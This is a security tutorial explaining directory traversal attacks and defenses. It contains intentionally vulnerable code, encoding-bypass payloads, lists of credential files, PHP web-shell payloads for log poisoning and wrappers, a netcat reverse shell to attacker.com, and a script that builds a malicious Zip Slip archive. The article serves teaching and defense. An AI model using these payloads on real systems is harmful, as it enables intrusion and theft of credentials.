Directory Traversal & Path Traversal: Exploiting File System Access Controls

Directory traversal vulnerabilities, also known as path traversal or dot-dot-slash attacks, enable attackers to access files and directories outside the application's intended scope. By manipulating file path references through user input, attackers bypass access controls to read sensitive configuration files, application source code, system credentials, and in some cases achieve remote code execution. These vulnerabilities persist across web applications, APIs, and desktop software due to inadequate input validation and insecure file handling practices. This article examines the technical mechanisms underlying directory traversal attacks, advanced exploitation techniques, encoding methods to bypass filters, and the various contexts where these vulnerabilities manifest.

Fundamental Concepts and Attack Mechanics

Web applications frequently implement functionality requiring file system access: downloading documents, displaying images, including templates, or reading configuration files. These operations typically restrict access to specific directories through application logic. Directory traversal exploits occur when applications fail to properly validate or sanitize file paths provided through user input.

The core technique involves using relative path sequences, particularly ../ on Unix-like systems and ..\ on Windows, to navigate up the directory tree. Consider a vulnerable file download function:

from flask import Flask, request, send_file

app = Flask(__name__)

@app.route('/download')
def download():
    # VULNERABLE: user input is interpolated into the path unchecked
    filename = request.args.get('file')
    filepath = f'/var/www/uploads/{filename}'
    return send_file(filepath)

A legitimate request like ?file=document.pdf accesses /var/www/uploads/document.pdf. However, an attacker inputs ?file=../../../../etc/passwd, constructing the path /var/www/uploads/../../../../etc/passwd, which resolves to /etc/passwd, exposing system user accounts.

The ../ sequence instructs the file system to move up one directory level. Multiple sequences traverse upward until reaching the root directory, from which attackers can reach any file readable by the account running the application. On Windows systems, both forward slashes and backslashes function as path separators, and drive letter specification enables cross-partition access: C:\Windows\System32\config\SAM.
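The resolution step can be reproduced without touching the file system. The following is a minimal sketch that uses Python's posixpath module to apply the same lexical rules; the resolve helper and BASE_DIR constant are illustrative names, not part of the vulnerable application above.

```python
import posixpath

BASE_DIR = "/var/www/uploads"  # base directory taken from the example above


def resolve(user_input: str) -> str:
    """Join user input to BASE_DIR and collapse '.' and '..' segments lexically."""
    return posixpath.normpath(posixpath.join(BASE_DIR, user_input))


print(resolve("document.pdf"))             # /var/www/uploads/document.pdf
print(resolve("../../../../etc/passwd"))   # /etc/passwd
print(resolve("../" * 10 + "etc/passwd"))  # /etc/passwd
```

The last call shows why attackers rarely need to know the exact directory depth: surplus ../ segments are simply absorbed at the root.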

Common Vulnerable Patterns

Directory traversal vulnerabilities manifest in various application contexts, each with specific exploitation characteristics and impact.

File Download Functionality

Download features represent the most common vulnerability vector. Applications allow users to retrieve uploaded files, documents, or media through URL parameters or POST data:

<?php
$file = $_GET['filename'];
$path = '/var/www/files/' . $file;
if (file_exists($path)) {
    header('Content-Type: application/octet-stream');
    readfile($path);
}
?>

This code directly concatenates user input into the file path without validation. Attackers exploit this to access arbitrary files: ?filename=../../../etc/shadow, ?filename=../../../../windows/win.ini.

Image and Media Display

Applications serving images or media files often construct paths from user-controllable parameters:

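const express = require('express');
const path = require('path');
const app = express();

app.get('/images/:filename', (req, res) => {
    // VULNERABLE: the decoded parameter is joined without a containment check
    const filename = req.params.filename;
    const filepath = path.join(__dirname, 'public/images', filename);
    res.sendFile(filepath);
});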

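path.join() only normalizes the path: it collapses ../ segments but does not keep the result inside public/images. Because the :filename parameter does not match a literal slash, attackers typically URL-encode the separators, for example /images/..%2f..%2f..%2fetc%2fpasswd, which the framework decodes before the handler runs. Unless the application verifies that the resolved path still sits under the image directory, such a request can reach sensitive files.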

Template and Configuration File Inclusion

Server-side template engines and configuration file loaders frequently accept file paths as parameters. If these come from user input, directory traversal becomes possible:

from flask import Flask, request, render_template_string

app = Flask(__name__)

def load_template(template_name):
    # VULNERABLE: template_name is placed in the path without validation
    template_path = f'templates/{template_name}'
    with open(template_path, 'r') as f:
        return f.read()

# Vulnerable endpoint
@app.route('/render')
def render():
    template = request.args.get('template')
    content = load_template(template)
    return render_template_string(content)

Attackers leverage this to read application source code, database configuration files, or other sensitive resources: ?template=../../../app/config/database.yml.

Log File Viewers

Administrative interfaces displaying log files often implement vulnerable file access patterns:

String logFile = request.getParameter("log");
String logPath = "/var/log/app/" + logFile;
BufferedReader reader = new BufferedReader(new FileReader(logPath));

This allows reading arbitrary system logs or configuration files: ?log=../../../etc/shadow, ?log=../../../../windows/system32/config/sam.

Advanced Exploitation Techniques

Basic ../ sequences often face filtering attempts. Sophisticated attackers employ numerous bypass techniques to evade input validation and access controls.

Absolute Path Injection

If applications check for ../ sequences but don't validate absolute paths, attackers provide complete file paths:

?file=/etc/passwd
?file=C:\Windows\System32\drivers\etc\hosts

This bypasses relative path filtering entirely, directly accessing target files if the application doesn't restrict to intended directories.
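Path-joining helpers often make this worse rather than better. As a small illustration, Python's join functions discard the base directory entirely when the second argument is absolute; naive_filter below is a hypothetical check that looks only for relative sequences.

```python
import posixpath


def naive_filter(user_input: str) -> bool:
    """Hypothetical filter that only rejects relative traversal sequences."""
    return "../" not in user_input and "..\\" not in user_input


user_input = "/etc/passwd"
passes_filter = naive_filter(user_input)

# An absolute second argument replaces everything that came before it.
joined = posixpath.join("/var/www/uploads", user_input)

print(passes_filter)  # True
print(joined)         # /etc/passwd
```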

Null Byte Injection

Historically, null bytes (%00) terminated strings in C-based languages, truncating file paths and bypassing extension checks. Though largely patched in modern systems, legacy applications remain vulnerable:

?file=../../../../etc/passwd%00.jpg

The application validates the .jpg extension, but the null byte truncates processing at /etc/passwd, ignoring the appended extension. PHP versions before 5.3.4 and many older applications remain exploitable through this technique.
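Modern runtimes generally refuse such paths instead of truncating them. The sketch below shows the behavior in Python 3, where file APIs raise ValueError for a path containing an embedded null; try_open is an illustrative helper name.

```python
def try_open(path: str) -> str:
    """Attempt to open a path and report how the runtime reacts."""
    try:
        with open(path, "rb"):
            return "opened"
    except ValueError as exc:
        # Raised before any system call is made when the path contains \x00
        return f"rejected: {exc}"
    except OSError as exc:
        return f"os error: {exc.strerror}"


print(try_open("/etc/passwd\x00.jpg"))
```

The call is rejected up front, so the .jpg suffix is never silently dropped.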

Encoding and Double Encoding

URL encoding obfuscates traversal sequences, bypassing simple string matching filters:

../     becomes    %2e%2e%2f
..\     becomes    %2e%2e%5c

Double encoding further evades detection when applications decode input multiple times:

../     becomes    %252e%252e%252f

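The first decoding produces %2e%2e%2f, which contains no literal ../ and so passes filters that inspect the once-decoded input. A second decoding step later in the request pipeline, for example in a proxy, a framework, or the application itself, reconstructs ../ and enables traversal.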
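The effect is easy to reproduce with the standard library. In this sketch, naive_check stands in for a hypothetical filter that decodes once, and fully_decode is one possible countermeasure that decodes until the value stops changing; both names are illustrative.

```python
from urllib.parse import unquote


def naive_check(value: str) -> bool:
    """Hypothetical filter: decode once, then look for a literal '../'."""
    return "../" not in unquote(value)


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Decode repeatedly until the value is stable, within a bounded number of rounds."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")


payload = "%252e%252e%252fetc%252fpasswd"
once = unquote(payload)   # %2e%2e%2fetc%2fpasswd
twice = unquote(once)     # ../etc/passwd

print(naive_check(payload))   # True: the filter sees no '../'
print(fully_decode(payload))  # ../etc/passwd
```

Validating the fully decoded value, or rejecting input that is still encoded after one pass, closes the gap between what the filter sees and what the file API receives.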

The non-standard %u Unicode encoding, accepted by IIS and some other legacy parsers, provides additional obfuscation:

../ becomes %u002e%u002e%u002f

UTF-8 overlong encoding represents characters using more bytes than necessary. The dot character (0x2E) can be encoded as %C0%AE:

../ becomes %C0%AE%C0%AE/

Vulnerable decoders normalize these to standard ASCII, reconstructing traversal sequences that bypass filters checking only standard encoding.
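The arithmetic behind the overlong form can be checked directly. The sketch below contrasts a hypothetical lenient decoder, which applies the two-byte UTF-8 bit layout without checking for overlong forms, with Python's strict built-in decoder.

```python
OVERLONG_DOT = b"\xc0\xae"  # two-byte overlong form of '.' (0x2E)


def lenient_two_byte_decode(data: bytes) -> str:
    """Hypothetical legacy decoder that skips the overlong-form check."""
    lead, cont = data
    # 110xxxxx 10yyyyyy -> xxxxxyyyyyy
    code_point = ((lead & 0x1F) << 6) | (cont & 0x3F)
    return chr(code_point)


print(lenient_two_byte_decode(OVERLONG_DOT))  # .

try:
    OVERLONG_DOT.decode("utf-8")
except UnicodeDecodeError as exc:
    print("strict decoder rejected the sequence:", exc.reason)
```

A standards-compliant decoder rejects the bytes outright, which is why this bypass mostly affects older or hand-written decoding routines.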

Path Truncation and OS-Specific Behaviors

Windows path handling strips trailing dots and spaces from file names, and older PHP versions (before 5.3) silently truncated paths that exceeded the maximum path length. Attackers pad the input with long runs of characters so that a suffix appended by the application, such as a forced extension, is cut off:

?file=../../../../boot.ini...................................

The padding pushes the appended suffix past the length limit, and the remaining trailing dots are normalized away, leaving only the target file name.

Windows also supports NTFS alternate data streams (ADS) and short filename notation (8.3 format):

?file=../../../../windows/win.ini::$DATA
?file=PROGRA~1\   (equivalent to Program Files)

Nested Encoding and Filter Evasion

Filters that remove ../ sequences in a single, non-recursive pass are defeated by nested traversal sequences:

....//    becomes    ../    (after removing ../)
..././    becomes    ../    (after removing ../)

The filter removes the inner ../, inadvertently constructing a valid traversal sequence from remaining characters. Multiple nesting levels defeat multiple filter passes.
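A single-pass filter of this kind can be sketched in a few lines. The function names below are illustrative; strip_until_stable shows the repeat-until-clean variant, which removes the sequences but is still a weaker defense than validating the canonical path.

```python
def strip_once(value: str) -> str:
    """Single-pass filter: remove every '../' found in one left-to-right scan."""
    return value.replace("../", "")


def strip_until_stable(value: str) -> str:
    """Repeat the removal until no '../' remains."""
    while "../" in value:
        value = value.replace("../", "")
    return value


print(strip_once("....//etc/passwd"))          # ../etc/passwd
print(strip_once("..././etc/passwd"))          # ../etc/passwd
print(strip_once(strip_once("......///")))     # ../ (two passes, double nesting)
print(strip_until_stable("....//etc/passwd"))  # etc/passwd
```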

Case Manipulation

Case-sensitive filters on case-insensitive file systems enable bypasses. The traversal characters themselves have no case, so the technique targets blocked file or directory names:

web.config becomes WEB.CONFIG   (or Web.Config, wEb.CoNfIg)

Windows file systems ignore case, making SYSTEM32 equivalent to system32, but filters checking exact strings miss case variations.
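The mismatch between an exact-match filter and a case-insensitive file system can be sketched as follows. BLOCKED_NAMES is a hypothetical blocklist, and folding case before comparison is one way to align the filter with the file system's behavior.

```python
BLOCKED_NAMES = {"web.config", "boot.ini"}  # hypothetical blocklist


def exact_match_blocked(name: str) -> bool:
    """Case-sensitive comparison, as a naive filter might implement it."""
    return name in BLOCKED_NAMES


def case_insensitive_blocked(name: str) -> bool:
    """Fold case first so the check matches a case-insensitive file system."""
    return name.casefold() in BLOCKED_NAMES


print(exact_match_blocked("WEB.CONFIG"))       # False: the filter is bypassed
print(case_insensitive_blocked("WEB.CONFIG"))  # True
```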

Platform-Specific Exploitation

Different operating systems and platforms present unique characteristics that influence exploitation techniques and target files.

Linux/Unix Target Files

Critical files on Linux systems contain sensitive information useful for further exploitation:

/etc/passwd          - User account information
/etc/shadow          - Password hashes (requires root)
/etc/group           - Group memberships
/proc/self/environ   - Environment variables (may contain credentials)
/proc/self/cmdline   - Process command line arguments
/var/log/apache2/access.log  - Web server logs (potential LFI to RCE)
/home/user/.ssh/id_rsa      - SSH private keys
/var/www/html/config.php    - Application configuration

The /proc pseudo-filesystem provides process and system information without requiring elevated privileges. /proc/self/environ often contains database credentials, API keys, and other sensitive configuration data.

Windows Target Files

Windows systems store critical configuration and credential data in specific locations:

C:\Windows\System32\config\SAM       - User password hashes
C:\Windows\repair\SAM                - Backup SAM file
C:\Windows\System32\drivers\etc\hosts - Host file
C:\inetpub\wwwroot\web.config        - IIS configuration
C:\xampp\htdocs\config.php           - Application config
C:\Windows\Panther\unattend.xml      - Windows installation config (often contains passwords)

Web.config files frequently contain database connection strings with cleartext credentials. Unattend.xml files store administrative passwords used during automated Windows installations.

Cloud and Container Environments

Modern cloud deployments introduce new target files containing credentials and configuration:

/var/run/secrets/kubernetes.io/serviceaccount/token  - Kubernetes service account
~/.aws/credentials                                   - AWS credentials (in the user's home directory)
~/.azure/                                            - Azure CLI configuration and cached tokens
/root/.docker/config.json                            - Docker registry credentials

Container environments often mount sensitive files or environment variables accessible through path traversal, enabling cloud infrastructure compromise.

Local File Inclusion to Remote Code Execution

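Directory traversal on its own yields arbitrary file read. When the traversed path is passed to an interpreter function such as PHP's include or require, the flaw becomes Local File Inclusion (LFI), which several techniques can escalate to Remote Code Execution (RCE).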

Log Poisoning

Web server access logs record user-controlled data including User-Agent headers and request URIs. Attackers inject PHP code into logs, then include the log file for execution:

# Inject payload into logs via User-Agent
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/

# Include log file and execute commands
http://target.com/view.php?file=../../../../var/log/apache2/access.log&cmd=whoami

The PHP interpreter executes the injected code within the included log file, providing remote command execution. This technique works with any file accepting attacker-controlled content: error logs, mail logs, or session files.

PHP Wrapper Exploitation

PHP provides stream wrappers enabling protocol-specific file access. The php://filter wrapper reads file contents with encoding transformations:

?file=php://filter/convert.base64-encode/resource=../../../../etc/passwd

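This returns base64-encoded file contents, bypassing restrictions on displaying raw file data and exposing PHP source that would otherwise be executed rather than shown. The php://input wrapper reads the raw request body as a file; when the target is an include statement and allow_url_include is enabled, this enables code injection: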

# POST request with PHP payload
POST /view.php?file=php://input HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

<?php system($_GET['cmd']); ?>

The data:// wrapper embeds data directly in the URL:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+

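This base64-encoded payload decodes to <?php system($_GET['cmd']); ?>, executing when included. Like php://input, data:// can only be included when allow_url_include is enabled, and the trailing + should be sent as %2B so that it is not decoded as a space.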

Session File Inclusion

PHP stores session data in predictable file locations, typically /var/lib/php/sessions/sess_[SESSIONID]. Attackers inject PHP code into session variables:

$_SESSION['username'] = '<?php system($_GET["cmd"]); ?>';

Then include the session file for execution:

?file=../../../../var/lib/php/sessions/sess_abc123&cmd=whoami

The PHP interpreter executes code stored in the session file, achieving RCE.

/proc/self/environ Exploitation

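The /proc/self/environ file contains environment variables for the current process. When PHP runs under CGI, request headers such as User-Agent are exposed as environment variables (HTTP_USER_AGENT), so attackers can inject code through them. The technique mainly applies to legacy deployments: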

curl -A "<?php system('nc attacker.com 4444 -e /bin/bash'); ?>" http://target.com/

Then include the environ file:

?file=../../../../proc/self/environ

PHP executes the injected payload, establishing a reverse shell.

Zip Slip Vulnerability

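Archive extraction represents a specialized path traversal variant. Maliciously crafted ZIP files contain entries with path traversal sequences in filenames. Vulnerable extraction code writes files outside intended directories. Python's zipfile.extractall() strips .. components from member names, so the pattern typically appears in hand-written extraction loops that join entry names to the destination themselves:

import os
import zipfile

with zipfile.ZipFile('malicious.zip', 'r') as zip_ref:
    for name in zip_ref.namelist():
        # VULNERABLE: entry name is joined to the destination unchecked
        with open(os.path.join('/var/www/uploads/', name), 'wb') as out:
            out.write(zip_ref.read(name))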

The archive contains a file named ../../../../var/www/html/shell.php. Upon extraction, this file is written to the web root directory, enabling remote code execution.

Creating a malicious ZIP archive:

import zipfile
import io

zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, 'w') as zip_file:
    info = zipfile.ZipInfo('../../../../var/www/html/shell.php')
    zip_file.writestr(info, '<?php system($_GET["cmd"]); ?>')

This vulnerability affects numerous programming languages and libraries that fail to validate extracted file paths. Similar issues exist in TAR, RAR, and other archive formats.
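One way to guard against this is to validate every entry before writing anything. The following is a minimal sketch, assuming that rejecting the whole archive on the first suspicious entry is acceptable; safe_extract and build_zip are illustrative names, and build_zip exists only to create test archives in memory.

```python
import io
import os
import tempfile
import zipfile


def safe_extract(archive_file, dest_dir: str) -> None:
    """Extract an archive only if every entry resolves inside dest_dir."""
    dest_root = os.path.realpath(dest_dir)
    with zipfile.ZipFile(archive_file) as archive:
        for member in archive.infolist():
            target = os.path.realpath(os.path.join(dest_root, member.filename))
            # Compare whole path components, not string prefixes
            if os.path.commonpath([dest_root, target]) != dest_root:
                raise ValueError(f"blocked archive entry: {member.filename!r}")
        archive.extractall(dest_root)


def build_zip(entry_name: str) -> io.BytesIO:
    """Demonstration helper: build a one-entry archive in memory."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr(zipfile.ZipInfo(entry_name), b"data")
    buffer.seek(0)
    return buffer


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as dest:
        safe_extract(build_zip("notes/readme.txt"), dest)  # extracted normally
        try:
            safe_extract(build_zip("../../evil.txt"), dest)
        except ValueError as exc:
            print(exc)
```

Checking all entries before extracting any of them avoids leaving a partially extracted archive behind when a later entry is rejected.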

API and Application-Specific Contexts

Modern applications present additional contexts where directory traversal manifests beyond traditional web applications.

REST API File Access

RESTful APIs providing file access through path parameters face traversal vulnerabilities:

GET /api/v1/files/../../../../etc/passwd
GET /api/documents/{id}/../../../config/database.yml

JSON-based APIs may accept file paths in request bodies:

{
  "document": "../../../../etc/passwd",
  "operation": "download"
}

GraphQL File Queries

GraphQL endpoints accepting file path arguments enable traversal:

query {
  getFile(path: "../../../../etc/passwd") {
    content
  }
}

GraphQL's flexible query structure complicates input validation, particularly when paths are constructed dynamically from multiple parameters.

XML External Entity with Path Traversal

XXE vulnerabilities combined with path traversal enable arbitrary file reading:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

This reads and returns file contents within XML responses.

Defense Mechanisms and Mitigation

Preventing directory traversal requires comprehensive input validation and secure file handling practices.

Input Validation and Allowlisting

Implement strict allowlists of permitted files or patterns:

ALLOWED_FILES = ['document.pdf', 'report.xlsx', 'image.png']

filename = request.args.get('file')
if filename not in ALLOWED_FILES:
    abort(403)

Reject any input containing path traversal sequences: ../, ..\, absolute paths, or null bytes.
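Where the set of files is known in advance, a related approach is to keep file names out of user input altogether and expose opaque identifiers instead. The sketch below assumes a hypothetical DOCUMENTS mapping; in practice this would usually be a database lookup.

```python
import posixpath
from typing import Optional

BASE_DIR = "/var/www/uploads"

# Hypothetical mapping from public identifiers to stored file names
DOCUMENTS = {
    "1001": "document.pdf",
    "1002": "report.xlsx",
    "1003": "image.png",
}


def path_for(document_id: str) -> Optional[str]:
    """Return the stored path for a known identifier, or None if it is unknown."""
    filename = DOCUMENTS.get(document_id)
    if filename is None:
        return None
    return posixpath.join(BASE_DIR, filename)


print(path_for("1001"))                    # /var/www/uploads/document.pdf
print(path_for("../../../../etc/passwd"))  # None
```

Because the user-supplied value is only ever used as a dictionary key, no traversal sequence can reach the file system.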

Path Canonicalization

Resolve paths to canonical form before validation:

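import os

base_dir = os.path.realpath('/var/www/uploads')
filename = request.args.get('file', '')
canonical_path = os.path.realpath(os.path.join(base_dir, filename))

# Compare whole path components: a plain startswith() check would also
# accept sibling directories such as /var/www/uploads_private
if os.path.commonpath([base_dir, canonical_path]) != base_dir:
    abort(403)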

This approach resolves symbolic links and relative path sequences, ensuring the final path remains within intended boundaries.
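The same containment check can be packaged as a reusable function. This is a minimal sketch using pathlib; resolve_inside is an illustrative name, and raising PermissionError is an assumption about how the caller wants failures reported.

```python
from pathlib import Path


def resolve_inside(base_dir: str, user_path: str) -> Path:
    """Resolve user_path under base_dir, refusing anything that escapes it."""
    base = Path(base_dir).resolve()
    # An absolute user_path replaces base here, so the check below still catches it
    candidate = (base / user_path).resolve()
    if base not in candidate.parents:
        raise PermissionError(f"path escapes base directory: {user_path!r}")
    return candidate


print(resolve_inside("/var/www/uploads", "reports/q1.pdf"))

for attempt in ("../../../etc/passwd", "/etc/passwd", "../uploads_private/key"):
    try:
        resolve_inside("/var/www/uploads", attempt)
    except PermissionError as exc:
        print(exc)
```

Comparing against candidate.parents works on whole path components, so a sibling directory whose name merely begins with the base directory's name is rejected as well.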

Framework Security Features

Utilize framework-provided secure file handling:

# Flask secure filename
from werkzeug.utils import secure_filename
filename = secure_filename(user_input)

# Django FilePathField with path restriction
from django.forms import FilePathField
field = FilePathField(path="/safe/directory/", recursive=False)

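secure_filename() strips path separators and other dangerous characters; it can return an empty string, which callers must reject. FilePathField limits the selectable values to files under the configured directory.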

Principle of Least Privilege

Run applications with minimal file system permissions. Use chroot jails or containers to isolate applications from the broader file system. Even if traversal occurs, limited permissions restrict accessible files.

Conclusion

Directory traversal vulnerabilities persist due to the fundamental challenge of safely handling user-controlled file paths. These vulnerabilities enable information disclosure, credential theft, and when combined with other techniques, remote code execution. Understanding advanced exploitation methods—from encoding bypasses to log poisoning—enables security professionals to identify and remediate these critical flaws. Effective defense requires rigorous input validation, path canonicalization, framework security features, and defense-in-depth approaches. As applications increasingly interact with file systems through APIs, cloud storage, and microservices architectures, vigilant attention to path handling security remains essential to preventing unauthorized file access and system compromise.